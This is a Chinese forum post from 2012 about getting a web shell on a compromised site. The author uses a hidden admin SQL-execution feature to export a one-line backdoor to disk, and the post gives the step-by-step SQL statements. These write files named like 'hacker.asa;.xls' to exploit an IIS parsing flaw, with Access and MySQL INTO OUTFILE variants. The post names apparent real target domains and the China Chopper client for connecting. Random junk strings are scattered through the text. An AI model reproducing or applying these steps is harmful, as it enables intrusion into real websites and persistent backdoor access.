好不容易进了后台,发现啥上传啊。备份啊多木有。4 w1 e- q R: [$ F A4 t: M* x9 F5 c! P8 B
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的' H& F8 n8 ^+ n8 G
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,: w8 X2 O! y+ Y1 Q
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:9 A x' Z9 z+ r! t4 H
1.create table cmd (a varchar(50))
) {# {8 P" H( N# a2.insert into cmd (a) values (‘‘) |2 r; g8 N$ r6 c
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd! L+ H S1 S' C4 g0 Z
(把表cmd的内容导出为物理路径的一个EXCEL文件)9 x1 |7 |/ U. ^; |$ s: D7 B$ T
4.drop table cmd
5 s/ U5 r( D9 q利用IIS的BUG成功拿到了WEBSHELL。
/ p+ ^8 b) o$ J& ^( E! c2 q" N" Q9 l, k1 |( ?$ X9 L
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话" D" e3 n# k- ^3 j
' W* O0 F4 i! ~: @+ X2 S; B* o
SQL语句意思解释:. v& d8 m, X& ?: k) Q
第一句
! D. ?, N K2 x% ?. |6 J$ V 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50! i' D6 s \8 `( C* u% E
5 x! b! e9 F: S" @, C+ C' J
第二句- L$ q7 g3 t* a3 N4 G" z' k( u/ V
在表cmd的a字段插入一句话木马
9 s8 `" k3 P2 |5 A- t4 f& j 第三句0 l3 O* e# u* X+ x4 |
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
. l I4 X5 E% _% T9 ]1 \+ |+ d9 }& E& V3 S& S. J, G. Q- o
第四句1 R2 W% x5 H1 q
删除建立的cmd表
4 F# u# u5 j' `; }! d
* L! k0 _! u# C+ w# f5 |4 S 以下内容为测试:
% I' e2 B8 L5 h3 E0 V Access利用后台SQL执行命令功能导出WebShell: c) a I' c0 P/ @' D3 I; ^5 v
这个更简单:
$ l4 R( @, N* C* E$ s# ]: F [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol] h8 L: X5 n" Z, f c
或者+ \% z) z5 w0 j0 v: q
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
4 G; t, b/ h3 h3 L& n$ r( c! V* K; g
后台有执行SQL语句功能(vote为已知表段)
* Z4 |% V! C. t) ^3 B6 p6 x8 ? 希望对大家有所帮助拿shell的又一个思路( z' o, F. h) K. L; _7 c7 R6 N5 Z
|
发表于 2012-9-13 17:53:58
收藏
支持
反对